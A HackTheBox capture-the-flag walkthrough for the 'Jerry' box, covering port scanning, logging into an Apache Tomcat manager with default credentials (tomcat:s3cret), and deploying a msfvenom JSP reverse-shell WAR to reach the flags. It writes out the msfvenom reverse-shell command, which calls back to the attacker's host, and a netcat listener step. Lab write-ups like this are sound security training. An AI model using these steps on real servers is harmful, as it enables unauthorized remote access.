Jerry

Jerry writeup by Thamizhiniyan C S

Overview

Hello everyone, In this writeup we are going to solve Jerry from HackTheBox.

Link for the machine : https://app.hackthebox.com/machines/Jerry

Lets Start 🙌

Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.

[ Click Here to learn more about how to connect to vpn and access the boxes. ]

After connecting to the vpn service, click on Join Machine to access the machine’s ip.

After joining the machine you can see the IP Address of the target machine.

---

Reconnaissance

Rustscan

First start the reconnaissance by running rustscan on the target IP address.

Command: rustscan -a 10.10.10.95 -- -A -T4 -v -Pn

Results

From the results of rustscan, we can see that on port 8080, Apache Tomcat service is running.

---

Information Gathering - Port 8080

I visited the web server running on http://10.10.10.95:8080/.

We can see the default home page of the Apache Tomcat server. I started exploring by clicking all the buttons and links in the home page.

I clicked the Manager App button and it redirected me to the following link: http://10.10.10.95:8080/manager/html, which prompted me for a username and password:

On investigating about the above URL, I found this

TomcatHackTricks

---

Enumeration - Port 8080

I tried admin:admin combination in the prompt and it thrown me the following error:

From the above error, we can see that they have shown a example, in which they have used tomcat:s3cret combination. Let’s give it a try with this combination.

It worked and we got access to the Application Manager.

Further surfing the Application Manager, we can see that there is an option to upload files of type WAR.

---

Initial Access

We can generate a msfvenom reverse shell and upload it as mentioned here:

TomcatHackTricks

Generate the Reverse Shell using the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HTB_tun_IP> LPORT=8888 -f war -o revshell.war

Now upload this revshell.war file and click deploy.

Now if we check the Applications table, we can see that a new path /revshell is generated.

Before clicking or viewing the /revshell link, start a netcat listener on your attack box / local machine on port 8888

Now click the /revshell and check the netcat listener.

We have successfully got access to the target machine.

---

Getting the Flags

Now we have to look out for the flags. I started surfing the machine. I visited the C:\Users directory and found the following users:

I checked the Administrator directory. In the Desktop folder of Administrator found the flags directory.

The flags directory had a file named 2 for the price of 1.txt.

You can view the contents of the 2 for the price of 1.txt file using the command: more "2 for the price of 1.txt"

We have successfully found both the user and root flags.

Thank You !!!!!!!